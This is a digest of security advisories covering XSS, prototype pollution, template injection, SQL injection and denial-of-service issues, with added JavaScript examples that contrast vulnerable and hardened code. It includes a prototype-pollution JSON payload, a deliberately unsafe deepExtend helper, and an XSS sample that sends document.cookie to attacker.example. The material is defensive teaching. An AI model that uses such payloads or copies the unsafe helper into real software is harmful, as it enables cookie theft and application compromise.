In PrivateBin < v1.4.0 a cross-site scripting (XSS) vulnerability was found. The vulnerability has been present since attachments with image preview were introduced in v0.21 of the project, which at the time was still called ZeroBin. The issue is caused by…
[Microsoft.NETCore.App] Improper Certificate Validation
.NET Core 1.0, 1.1, and 2.0 allow an unauthenticated attacker to remotely cause a denial of service against a .NET Core web application through improper parsing of certificate data. A denial of service vulnerability exists when .NET Core improperly ha…
[fullpage.js] Prototype Pollution in fullpage.js
fullPage utils are exposed to developers through window.fp_utils, so they can be used for purposes other than fullPage itself. However, one of these utils, deepExtend, is vulnerable to prototype pollution.
Javascript is “pro…
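The flaw class above, as an added example that is not fullPage.js code: a recursive deep-extend written the way such helpers commonly are, which walks into `__proto__` and so writes attacker-chosen keys onto `Object.prototype`, beside a hardened variant. The option name `speed` and the JSON payload are constructed for the demonstration.

```javascript
// Added example (not fullPage.js source): prototype pollution through a
// recursive deep-extend, and a hardened version of the same helper.

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable pattern: every enumerable key is copied, including "__proto__".
// target["__proto__"] resolves (via the inherited accessor) to Object.prototype,
// which is a plain object, so the recursion descends into it and writes there.
function deepExtendUnsafe(target, source) {
  for (const key in source) {
    if (isPlainObject(source[key])) {
      if (!isPlainObject(target[key])) target[key] = {};
      deepExtendUnsafe(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened: own keys only, the three keys that can reach a prototype are
// skipped, and recursion only continues into an own plain object on the target.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function deepExtendSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      deepExtendSafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed payload: JSON.parse yields an *own* property literally named
// "__proto__", which is what a merge helper must refuse to follow.
const ATTACKER_OPTIONS_JSON = '{"__proto__": {"polluted": true}, "speed": 700}';

// Runs one extend implementation against the payload and reports whether a
// fresh, unrelated object now sees the injected key. Cleans up afterwards so
// the rest of the process is unaffected.
function demo(extendFn) {
  const opts = extendFn({}, JSON.parse(ATTACKER_OPTIONS_JSON));
  const leaked = ({}).polluted === true;
  delete Object.prototype.polluted;
  return { leaked, speed: opts.speed };
}

// Usage (assumed, for illustration):
//   demo(deepExtendUnsafe) -> { leaked: true,  speed: 700 }
//   demo(deepExtendSafe)   -> { leaked: false, speed: 700 }
```

The practical check when reviewing any merge or extend helper that takes untrusted input is the same as in `demo`: after the call, look for the injected key on a brand-new `{}`. Freezing `Object.prototype` or merging into `Object.create(null)` are complementary defenses when the helper cannot be changed.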
[bolt/core] Code Injection in Bolt CMS
Bolt CMS <= 4.2 is vulnerable to remote code execution. Unsafe theme rendering allows an authenticated attacker who can edit a theme to inject server-side template code (server-side template injection), which leads to remote code execution.
References
https://nvd.nist.gov/vuln/detail/…
[nokogiri] Denial of Service (DoS) in Nokogiri on JRuby
Summary
Nokogiri v1.13.4 updates the vendored org.cyberneko.html library to 1.9.22.noko2 which addresses CVE-2022-24839. That CVE is rated 7.5 (High Severity).
See GHSA-9849-p7jc-9rmv for more information.
Please note that this advisory only applies to…
[nokogiri] XML Injection in Xerces Java affects Nokogiri
Summary
Nokogiri v1.13.4 updates the vendored xerces:xercesImpl from 2.12.0 to 2.12.2, which addresses CVE-2022-23437. That CVE is scored as CVSS 6.5 “Medium” on the NVD record.
Please note that this advisory only applies to the JRuby implementation of…
[nokogiri] Out-of-bounds Write in zlib affects Nokogiri
Summary
Nokogiri v1.13.4 updates the vendored zlib from 1.2.11 to 1.2.12, which addresses CVE-2018-25032. That CVE is scored as CVSS 7.4 “High” on the NVD record as of 2022-04-05.
Please note that this advisory only applies to the CRuby implementation …
[nokogiri] Inefficient Regular Expression Complexity in Nokogiri
Summary
Nokogiri < v1.13.4 contains an inefficient regular expression that is susceptible to excessive backtracking when attempting to detect encoding in HTML documents.
Mitigation
Upgrade to Nokogiri >= 1.13.4.
Severity
The Nokogiri maintainers …
[tableexport.jquery.plugin] Cross-site Scripting in tableexport.jquery.plugin
There is a cross-site scripting vulnerability with default onCellHtmlData function in GitHub repository hhurz/tableexport.jquery.plugin prior to 1.25.0. This can result in transmitting cookies to third-party servers and/or sending data from secure sess…
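The advisory names the default `onCellHtmlData` callback as the injection point. As an added example (not the plugin's code), the block below contrasts a pass-through hook, which places whatever markup a cell contains verbatim into the exported document, with an escaping hook a site can supply until it upgrades. The hook signature `(cell, row, col, htmlData)` returning the string to emit, and the sample cell values, are assumptions for the illustration.

```javascript
// Added example (not tableexport.jquery.plugin source): escaping cell markup
// before it is written into an HTML-based export.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escapes the five characters that can open markup or break out of an attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Pass-through hook, the shape the advisory describes as vulnerable
// (assumed signature: cell, row, col, htmlData -> string to emit).
function passThroughCellHtmlData(cell, row, col, htmlData) {
  return htmlData;
}

// Hardened hook: the cell content reaches the export as text, never as markup.
function escapingCellHtmlData(cell, row, col, htmlData) {
  return escapeHtml(htmlData);
}

// Builds one exported table row by running every cell through the hook.
function renderExportRow(cellHtmlValues, hook) {
  const tds = cellHtmlValues.map((html, col) => '<td>' + hook(null, 0, col, html) + '</td>');
  return '<tr>' + tds.join('') + '</tr>';
}

// True when a hook's output still contains a raw tag delimiter, i.e. the
// export would render it as markup rather than as text.
function emitsRawMarkup(hookOutput) {
  return /[<>]/.test(hookOutput);
}

// Constructed sample: the second cell carries an attacker-controlled value that
// would exfiltrate document.cookie if the export is opened as HTML.
const SAMPLE_ROW = [
  'Alice',
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
];

// Usage (assumed, for illustration):
//   renderExportRow(SAMPLE_ROW, passThroughCellHtmlData)  // payload emitted verbatim
//   renderExportRow(SAMPLE_ROW, escapingCellHtmlData)     // payload emitted as &lt;img ...&gt;
```

Entity escaping is the right treatment only for export formats that are rendered as HTML (for example Word- or Excel-style documents built from markup). For a plain CSV or text export, emit the cell's text content rather than HTML entities, otherwise the data itself is corrupted.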
[pimcore/pimcore] SQL Injection in Pimcore
Pimcore prior to version 10.3.5 is vulnerable to SQL injection in RecyclebinController.php. This vulnerability affects data confidentiality.
References
https://nvd.nist.gov/vuln/detail/CVE-2022-1219
https://github.com/pimcore/pimcore/commit/a697830359df0…